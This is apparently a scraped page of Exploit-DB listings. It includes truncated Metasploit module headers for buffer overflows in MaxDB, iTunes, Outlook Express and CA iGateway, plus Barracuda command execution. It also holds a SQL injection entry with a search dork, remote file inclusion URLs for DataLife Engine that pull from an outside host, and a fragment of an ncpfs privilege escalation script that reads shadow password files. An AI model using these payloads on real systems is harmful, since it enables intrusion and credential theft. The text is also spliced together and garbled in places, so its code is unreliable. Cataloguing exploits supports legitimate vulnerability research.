class Metasploit3 'MaxDB WebDBM GET Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the MaxDB WebDBM
service. This service is included with many recent versions
of the MaxDB and SAPDB products. This particular module is
capable of exploiting Windows systems through the use of an
SEH frame overwrite. The offset to the SEH frame may change
depending on
Exploit-DB
Apple iTunes 4.7 - Playlist Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2005-0043 Apple iTunes 4.7 - Playlist Buffer Overflow (Metasploit)
---
##
# $Id: apple_itunes_playlist.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Apple ITunes 4.7 Playlist Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Apple ITunes 4.7
build 4.7.0.42. By creating a URL link to a malicious PLS
file, a remote attacker could overflow a buffer and execute
arbitrary code. When using this module, be sure to set the
URIPATH with an extension of '.pls'.
},
'License' => MSF_LICE
Exploit-DB
Microsoft Outlook Express - NNTP Response Parsing Buffer Overflow (MS05-030) (Metasploit)
exploitdb·2010-05-09
CVE-2005-1213 Microsoft Outlook Express - NNTP Response Parsing Buffer Overflow (MS05-030) (Metasploit)
---
##
# $Id: ms05_030_nntp.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 'Microsoft Outlook Express NNTP Response Parsing Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the news reader of Microsoft
Outlook Express.
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2005-1213' ],
[ 'OSVDB', '17306' ],
[ 'BID', '13951' ],
[ 'MSB', 'MS05-03
Exploit-DB
Barracuda - IMG.pl Remote Command Execution (Metasploit)
exploitdb·2010-04-30
CVE-2005-2847 Barracuda - IMG.pl Remote Command Execution (Metasploit)
---
##
# $Id: barracuda_img_exec.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Barracuda IMG.PL Remote Command Execution',
'Description' => %q{
This module exploits an arbitrary command execution vulnerability in the
Barracuda Spam Firewall appliance. Versions prior to 3.1.18 are vulnerable.
},
'Author' => [ 'Nicolas Gregoire ', 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'References' =>
[
['CVE', '2005-2847'],
['OSVDB',
Exploit-DB
CA iTechnology iGateway - Debug Mode Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2005-3190 CA iTechnology iGateway - Debug Mode Buffer Overflow (Metasploit)
---
##
# $Id: ca_igateway_debug.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 'CA iTechnology iGateway Debug Mode Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability in the Computer Associates
iTechnology iGateway component. When True is enabled
in igateway.conf (non-default), it is possible to overwrite the stack
and execute code remotely. This module works best with Ordinal payloads.
},
'Author' => 'patrick',
'License' => MSF_LICENS
Exploit-DB
SoftBizScripts Hosting Script - SQL Injection
exploitdb·2010-04-28
CVE-2005-3817 SoftBizScripts Hosting Script - SQL Injection
---
# Exploit Title: SoftBizScripts Hosting Script SQL Injection Vulnerability
# Date: 29-4-2010
# Author: 41.w4r10r
# Vendor Link : http://softbizscripts.com/
# Version: Web Application
# Tested on: Apache/Unix
# CVE : [if exists]
# Dork : inurl:"browsecats.php?cid="
# Code :
############################################################################
#Greetz to all Andhra Hackers and ICW Members[Indian Cyber Warriors]
#Thanks: SaiSatish,FB1H2S,Godwin_Austin,Micr0,Harin,Jappy,Dark_Blue,sid3^3f3c7
#Shoutz: hg_H@x0r,r45c4l,Yash,Hackuin,unn4m3d
#Catch us at www.andhrahackers.com or www.teamicw.in
############################################################################
Exploited Link :
http://[site]m/browsecats.php?cid=2'
example :
http
Exploit-DB
DataLife Engine 8.3 - '/engine/ajax/addcomments.php?_REQUEST[skin]' Remote File Inclusion
exploitdb·2010-01-19
CVE-2010-2005 DataLife Engine 8.3 - '/engine/ajax/addcomments.php?_REQUEST[skin]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/37851/info
Datalife Engine is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.
Datalife Engine 8.3 is vulnerable; other versions may also be affected.
http://www.example.com/engine/ajax/addcomments.php?_REQUEST[skin]]=http://www.example2.com
Exploit-DB
DataLife Engine 8.3 - '/engine/inc/include/init.php?selected_language' Remote File Inclusion
exploitdb·2010-01-19
CVE-2010-2005 DataLife Engine 8.3 - '/engine/inc/include/init.php?selected_language' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/37851/info
Datalife Engine is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.
Datalife Engine 8.3 is vulnerable; other versions may also be affected.
http://www.example.com/engine/inc/include/init.php?selected_language=http://www.example2.com
Exploit-DB
DataLife Engine 8.3 - '/engine/inc/help.php?config[langs]' Remote File Inclusion
exploitdb·2010-01-19
CVE-2010-2005 DataLife Engine 8.3 - '/engine/inc/help.php?config[langs]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/37851/info
Datalife Engine is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.
Datalife Engine 8.3 is vulnerable; other versions may also be affected.
http://www.example.com/engine/inc/help.php?config[langs]=http://www.example2.com
Exploit-DB
DataLife Engine 8.3 - '/engine/ajax/pm.php?config[lang]' Remote File Inclusion
exploitdb·2010-01-19
CVE-2010-2005 DataLife Engine 8.3 - '/engine/ajax/pm.php?config[lang]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/37851/info
Datalife Engine is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.
Datalife Engine 8.3 is vulnerable; other versions may also be affected.
http://www.example.com/engine/ajax/pm.php?config[lang_=http://www.example2.com
Exploit-DB
ncpfs < 2.2.6 (Gentoo / Linux) - Local Privilege Escalation
exploitdb·2005-01-30
CVE-2010-0788 ncpfs < 2.2.6 (Gentoo / Linux) - Local Privilege Escalation
ncpfs /dev/null
(echo $1
ncpmount $MNTDIR
echo)
(rmdir $MNTDIR
rm ~/.nwclient
mv .nwclient.temp .nwclient)2>/dev/null)}
(for i in /etc/*shadow*
do head1 $i
done)))#
# milw0rm.com [2005-01-30]
No writeups or analysis indexed.
http://www.packetstormsecurity.com/1001-exploits/datalifeengine83-rfi.txt
http://www.securityfocus.com/bid/37851
https://exchange.xforce.ibmcloud.com/vulnerabilities/55757
2010-05-20
Published